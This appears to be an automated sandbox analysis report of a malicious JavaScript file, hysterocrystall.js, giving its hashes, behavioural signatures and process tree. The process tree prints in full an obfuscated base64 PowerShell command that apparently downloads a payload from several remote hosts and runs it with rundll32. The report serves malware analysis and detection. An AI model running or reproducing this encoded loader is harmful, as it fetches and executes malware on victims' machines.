Analysis
-
max time kernel
41s -
max time network
30s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
25-05-2023 06:41
Static task
static1
Behavioral task
behavioral1
Sample
hysterocrystall.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
hysterocrystall.js
Resource
win10v2004-20230220-en
General
-
Target
hysterocrystall.js
-
Size
258KB
-
MD5
ee5f6a2f511d04c2bfcce4f56cf7e51d
-
SHA1
73b9aa52792f9413a329d7587c299d29d799e549
-
SHA256
db05c7e247d0a1a64c74a3e5dea2ed7b2b7e4c59c9344e23d852841fc86ee5c9
-
SHA512
797419d1e8524e2cf661d3696bd22a39d3af642c423d40b33275f1a8487481c51591e3a4d4d3cf8f4f1a8775fcc837a03df0683dd0b10431a22f570cb7365996
-
SSDEEP
3072:yHpEjlMSlxMQ1zyY6freW+Kz5eDn1ZiD6xAwEinxpHZWfpKxUOlY0:kK2Y6TN+EeDnHBxAwEinxpQKxUOlY0
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 972 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 972 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1944 wrote to memory of 584 1944 wscript.exe 28 PID 1944 wrote to memory of 584 1944 wscript.exe 28 PID 1944 wrote to memory of 584 1944 wscript.exe 28 PID 584 wrote to memory of 972 584 wscript.exe 30 PID 584 wrote to memory of 972 584 wscript.exe 30 PID 584 wrote to memory of 972 584 wscript.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\hysterocrystall.js1⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\ProgramData\GigantomachySaccharated.js" parallactically Mistrusted antegrade bullacesCharge2⤵
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABkAHkAbgBhAG0AaQB0AGkAbgBnAFAAYQBwAGUAcgBtAGEAawBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAawBBAEcAVQBBAGMAQQBCAHMAQQBHADgAQQBlAFEAQgBNAEEARwBFAEEAWgBBAEIANQBBAEcASQBBAGEAUQBCAHkAQQBHAFEAQQBMAGcAQgBoAEEARwB3AEEARQBXAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABrAEEATQBnAEEAdQBBAEQAWQBBAE0AUQBBAHUAQQBEAEUAQQBOAFEAQQA1AEEAQwA0AEEATQBnAEEAegBBAEQAQQBBAEUAVwBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAawBBAEcAVQBBAGIAUQBCAHAAQQBIAE0AQQBkAEEAQQB1AEEASABZAEEAWgBRAEIAdQBBAEgAUQBBAGQAUQBCAHkAQQBHAFUAQQBjAHcAQQA9ACIAOwAkAHUAbgBvAGIAZQB5AGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBOAEEARwBFAEEAYgBBAEIAbABBAEcAWQBBAGEAUQBCAGoAQQBHAFUAQQBiAGcAQgAwAEEARwB3AEEAZQBRAEIARABBAEcAOABBAGIAUQBCAHcAQQBHAHcAQQBZAFEAQgBwAEEARwA0AEEAZABBAEEAdQBBAEcASQBBAFoAUQBCADAAQQBBAD0APQAiADsAJAB3AGEAdABlAHIAdwBhAHkAcwBDAG8AdQBuAHQAZQByAG0AYQBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAzAEEARABNAEEATABnAEEAeABBAEQAYwBBAE0AQQBBAHUAQQBEAFEAQQBNAHcAQQB1AEEARABjAEEATgBBAEEAdgBBAEUAMABBAFcAQQBBAHYAQQBEAFkAQQBFAHIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABVAEEATABnAEEAeABBAEQAVQBBAE0AUQBBAHUAQQBEAEUAQQBOAHcAQQAzAEEAQwA0AEEATgBRAEEAeQBBAEMAOABBAFMAdwBBAHYAQQBFAEkAQQBiAEEAQgB3AEEARQBJAEEAWQB3AEEAPQBFAHIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATwBBAEEAdQBBAEQASQBBAE0AdwBBADAAQQBDADQAQQBPAEEAQQB5AEEAQwA0AEEATQBnAEEAMABBAEQAQQBBAEwAdwBCAFEAQQBIAFEAQQBVAHcAQQAyAEEARwA0AEEATAB3AEIATQBBAEcAYwBBAFoAdwBBAD0ARQByAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBIAGsAQQBNAEEAQgB4AEEARQBNAEEAWQB3AEIASQBBAEcAOABBAFIAQQBCAHUAQQBBAD0APQBFAHIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQAxAEEARABrAEEATABnAEEANQBBAEQAZwBBAEwAdwBCAFEAQQBIAEEAQQBWAFEAQgBaAEEARgBnAEEATAB3AEIATQBBAEcAawBBAE4AdwBCAEwAQQBEAGsAQQBSAGcAQQAwAEEARQBJAEEAVQBnAEIAQwBBAEUAOABBAEUAcgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBNAFEAQQB3AEEARABRAEEATAB3AEIAVQBBAEUAdwBBAFIAdwBCAG8AQQBFADQAQQBaAEEAQQB2AEEASABFAEEAZQBnAEIAcABBAEYAQQBBAFIAUQBCAHEAQQBFAEUAQQBSAHcAQQB3AEEARwBZAEEAVAB3AEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAByAGUAYQBwAHAAbwBpAG4AdABtAGUAbgB0AHMAQQBnAHUAcgBvAHQAaAAgAGkAbgAgACQAdwBhAHQAZQByAHcAYQB5AHMAQwBvAHUAbgB0AGUAcgBtAGEAbgAgAC0AcwBwAGwAaQB0ACAAIgBFAHIAIgApACAAewB0AHIAeQAgAHsAJABzAHQAYQByAHYAZQByAFAAcgBlAGMAbwBsAGwAdQBkAGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATQBRAEEAdQBBAEQASQBBAE4AUQBBADEAQQBDADQAQQBOAFEAQQB3AEEAQwA0AEEATQBnAEEAeQBBAEQAWQBBAEkASQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AQQBBADIAQQBDADQAQQBOAEEAQQB6AEEAQwA0AEEATQBnAEEAegBBAEQAQQBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQA9ACIAOwAkAHAAcgBvAHQAZQByAG8AYgBhAHMAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE0AdwBBAHUAQQBEAEkAQQBNAFEAQQB5AEEAQwA0AEEATwBRAEEAMQBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBZAGcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBRAEEAdwBBAEMANABBAE0AZwBBAHgAQQBEAGMAQQBMAGcAQQB4AEEARABnAEEATQB3AEEAdQBBAEQAWQBBAE0AQQBBAD0AIgA7ACQARQBuAHMAYwByAG8AbABsAGkAbgBnAEMAbwBtAG0AdQB0AGEAYgBpAGwAaQB0AHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBlAGEAcABwAG8AaQBuAHQAbQBlAG4AdABzAEEAZwB1AHIAbwB0AGgAKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABFAG4AcwBjAHIAbwBsAGwAaQBuAGcAQwBvAG0AbQB1AHQAYQBiAGkAbABpAHQAeQAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABNAGEAbgB0AG8AbABvAGcAaQBzAHQALgBIAG8AbwBzAGcAbwB3ADsAJABnAG8AbwBkAHkAZQBhAHIAVQBuAGMAbwBjAGsAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHkAQQBHAEUAQQBhAFEAQgB1AEEARwBRAEEAYwBnAEIAdgBBAEgAQQBBAFUAQQBCAGwAQQBIAEkAQQBiAFEAQgBwAEEASABRAEEAZABBAEIAaABBAEcANABBAFkAdwBCAGwAQQBDADQAQQBkAHcAQgBwAEEARwA0AEEAIgA7ACQARwB1AGkAbABhAG4AZABpAG4AYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATwBBAEcAOABBAFkAdwBCADAAQQBHAGsAQQBjAHcAQQB1AEEARwBjAEEAWQBRAEIAdABBAEcAVQBBAGMAdwBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwATQBhAG4AdABvAGwAbwBnAGkAcwB0AC4ASABvAG8AcwBnAG8AdwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIAMgA1ADcANgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARQAwAEEAWQBRAEIAdQBBAEgAUQBBAGIAdwBCAHMAQQBHADgAQQBaAHcAQgBwAEEASABNAEEAZABBAEEAdQBBAEUAZwBBAGIAdwBCAHYAQQBIAE0AQQBaAHcAQgB2AEEASABjAEEATABBAEIAaQBBAEcAawBBAGIAZwBCAGsAQQBEAHMAQQAiADsAJABDAG8AdwBiAG8AeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgAVQBBAGMAZwBCAGoAQQBHAGcAQQBZAFEAQgB6AEEARwBVAEEAWgBBAEIAUQBBAEcARQBBAGMAZwBCAHYAQQBHAFEAQQBhAFEAQgB6AEEASABRAEEAYQBRAEIAagBBAEMANABBAFkAdwBCAGgAQQBIAEkAQQBaAEEAQgB6AEEAQQA9AD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAFEAQQBMAGcAQQA0AEEARABNAEEATABnAEEAeABBAEQAYwBBAE8AUQBBAHUAQQBEAEUAQQBPAEEAQQB5AEEAQQA9AD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHoAQQBIAFUAQQBZAGcAQgAyAEEARwBFAEEAWgB3AEIAcABBAEcANABBAFkAUQBCAHMAQQBDADQAQQBZAHcAQgBvAEEARwBVAEEAWQBRAEIAdwBBAEEAPQA9AHkAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBTAEEARwBVAEEAWgBRAEIAbQBBAEcAVQBBAGMAZwBCAEkAQQBHAEUAQQBjAGcAQgB2AEEASABNAEEAWgBRAEIAMABBAEcAZwBBAEwAZwBCAGwAQQBHAEUAQQBjAGcAQgAwAEEARwBnAEEAIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7AH0AfQA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:972
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
258KB
MD5ee5f6a2f511d04c2bfcce4f56cf7e51d
SHA173b9aa52792f9413a329d7587c299d29d799e549
SHA256db05c7e247d0a1a64c74a3e5dea2ed7b2b7e4c59c9344e23d852841fc86ee5c9
SHA512797419d1e8524e2cf661d3696bd22a39d3af642c423d40b33275f1a8487481c51591e3a4d4d3cf8f4f1a8775fcc837a03df0683dd0b10431a22f570cb7365996